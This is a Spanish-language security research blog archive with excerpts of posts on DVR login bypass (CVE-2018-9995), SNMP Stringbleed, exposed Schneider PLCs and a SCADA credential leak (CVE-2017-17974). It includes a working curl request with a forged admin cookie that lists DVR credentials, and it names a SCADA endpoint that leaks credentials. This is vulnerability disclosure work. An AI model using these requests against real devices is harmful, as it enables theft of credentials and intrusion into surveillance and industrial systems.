lunes, 30 de abril de 2018

[update] DVR Login Bypass ( CVE-2018-9995 )

En un articulo anterior presente una vuln que me permitía obtener las credenciales de cierto modelo de DVR.

Tan simple como:


$> curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
Resulta que el hallazgo no corresponde a un vendor en particular como originalmente supuse.


domingo, 29 de abril de 2018

#Strinbleed, SNMP Protocol "God Mode".

Hoy me levante recordando a #strinbleed, el primer interesante hallazgo que sacamos con el amigo Jose (@bertinjoseb). Esto fue a principios de Abril y recien el marzo/2017 había escrito algo respecto. En ese momento hacia referencia a unos "curiosos" Comunity strings. 

Un tiempo despues salio el CVE-2017-5135 y al hallazgo lo bautizamos como Stringbleed.




martes, 17 de abril de 2018

[schneider] Un poco de Unity XL

Un ciber-delincuente con malas intenciones como podría conectarse a algunos de los miles de PLC Schneider que están expuestos al mundo? Y ademas operarlo, Un opción nativa sera UNITY XL. (el IDE Oficial de Schneider.)





Se tendrá que descargar e instalar el software y luego con un poco de Shodan, ( claro tmb; fofa, censys, google, bing, etc) y equipos no faltaran.

lunes, 9 de abril de 2018

[TBK Vision] DVR Login Bypass ( CVE-2018-9995 )

Estaba en la caza de cierto cacharro ICS/OT y en el camino apareció otro tipo de dispositivo, me refiero a un lindo DVR, del que sin querer salio este POST.


Todo comenzo aqui:




viernes, 6 de abril de 2018

[tool] PlinPlamPlum: "SCADAS "BAS920 & ISC2000"; Credentials Exposed"

Sumando una tool al repo (github.com/ezelf), para explotar un simple fallo (CVE-2017-17974) que traen  SCADAS de la firma “BA SYSTEM”:

El fallo implica enviar una simple peticion a "http://<host>/isc/get_sid_js.aspx",  y finalmente uno consigue hacerse con las credenciales de la plataforma



para que se vea "mas bonito" salio esto:

-------------
------------